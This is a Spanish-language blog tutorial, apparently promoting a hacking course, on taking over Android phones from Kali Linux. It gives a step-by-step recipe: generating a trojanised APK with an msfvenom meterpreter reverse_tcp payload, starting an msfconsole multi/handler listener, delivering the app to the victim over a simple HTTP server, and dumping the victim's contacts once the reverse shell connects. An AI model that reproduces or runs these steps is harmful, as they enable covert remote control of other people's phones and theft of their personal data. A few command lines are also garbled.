HACKEAR DISPOSITIVOS ANDROID DESDE KALI LINUX 2.0

Si te interesa saber más puedes consultar nuestros cursos presenciales en donde verás esta y otras técnicas que se verán en OSEC-II para más información: http://tpx.mx/cursos/osec-i

Antes me gusta gustaba jugar mucho con ANDROID fuera y dentro de mi red. En el cual solo tenia que crear una aplicación .apk podría hacerlo por medio del los comandos de KALI LINUX o crearlo por tus propios códigos. En el cual habían empresas que te ofrecían eso. El problema seria solo tener acceso al móvil para llegarlo inyectar.
Ahora que puedes compartir archivos con SimpleHTTPSever. Puedes descargar el paquete y instalarlo en tan solo 10segundos. Pero venga solo vamos a mostrar algo simple en el cual solo funciona dentro de la red.

Primer Paso:
– Tener todo nuestro sistema operativo KALI LINUX actualizado.
Segundo Paso:

  • Leer un articulo que cree en el 2014 HERE

Tercer Paso:
INICIAR NUESTRA CONSOLA DE MSFCONSOLE

 service postgresql start

OBTENER NUESTRA IP PREDETERMINADA

 ifconfig

AHORA TENEMOS LA CONSOLA LISTA PARA COCINAR NUESTRA APLICACIÓN Y VAMOS CREAR LA .apK

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=8888 R > (NOMBRE).apk

Les explico algo rápido.

 android/meterpreter/reverse_tcp

Debido a que nuestra carga útil es reverse_tcp donde el atacante espera que la víctima para que se conecte de nuevo a la máquina del atacante, el atacante tiene que configurar el controlador para manejar las conexiones entrantes al puerto.
Como tambien sabemos he publicado un video sobre muchos exploit publicado. Ahora vemos la IP esa es tu IP predeterminada y el PUERTO en mi caso recomiendo 8080 o 8888 por default esta 4444

 msfconsole

Para abrir nuestra consola y controlar el mismo exploit por allí.

 use multi/handler

Como sabemos rapid7 se maneja con este comando en el cual usaremos el mismo exploit en la consola.

 set PAYLOAD android/meterpreter/reverse_tcp

como observan usamos el mismo exploit que creamos la aplicación.

 show options

Podemos ver como esta configurado y esta configurado por default. Entonces tenemos que cambiar la IP y PUERTO.

 set LHOST IP
 set set LPORT 8888

Ahora para ejecutamos la aplicación

 exploit -j

Le vamos a enviar la aplicación para que lo instale por medio SimpleHTTPSever muy cómodamente.
Listo cuando la consola comienza a correr ustedes tiene acceso al móvil.

 dump_contacts

(LISTA DE CONTACTO)
Hay más comandos HERE

O pida ayuda en la misma consola colocando “HELP”
Espero haberte ayudado y no te olvide de compartir. RECUERDA EXISTE MUCHOS MÉTODOS.
PRONTO UN VIDEO